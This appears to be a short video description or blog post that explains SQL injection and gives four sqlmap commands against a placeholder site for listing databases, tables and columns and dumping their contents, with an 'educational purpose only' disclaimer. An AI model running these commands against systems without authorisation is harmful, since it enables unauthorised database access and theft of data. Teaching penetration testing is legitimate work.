Hello Every One,
Today in this video i'm going to show you how to use sql injection on website by sqlmap on kali linux
Sql injection is a methode to hack website database or webserver by using sql injection attack on kali linux
Sql injection error can fix very easy way.
This tutorial is all about sql injection attack & errors on websites and using sqlmap on
Kali Linux
What is sql injection ?
SQL injection is a code injection technique,used to attack data-driven applications,
in which nefarious SQL statements are inserted into an entry field for execution.
What is sqlmap ?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Up until sqlmap version 0.8, the tool has been yet another SQL injection tool, used by web application penetration testers/newbies/curious teens/computer addicted/punks and so on.
Things move on and as they evolve, we do as well. Now it supports this new switch, -d, that allows you to connect from your machine to the database server's TCP port where the database management system daemon is listening on and perform any operation you would do while using it to attack a database via a SQL injection vulnerability.
sqlmap -u "http://www.target.com/section...id=" --dbs
sqlmap -u "http://www.target.com/section...id=" -D database_name --tables
sqlmap -u "http://www.target.com/section...id=" -D database_name -T tables_name --columns
sqlmap -u "http://www.target.com/section...id=" -D database_name -T tables_name -C column_name --dump
All these videos are By SSTec Tutorials for educational purpose only ,
Don't misuse it. STAY LEGAL!!!
Enjoy 😉
0 Reviews:
Post Your Review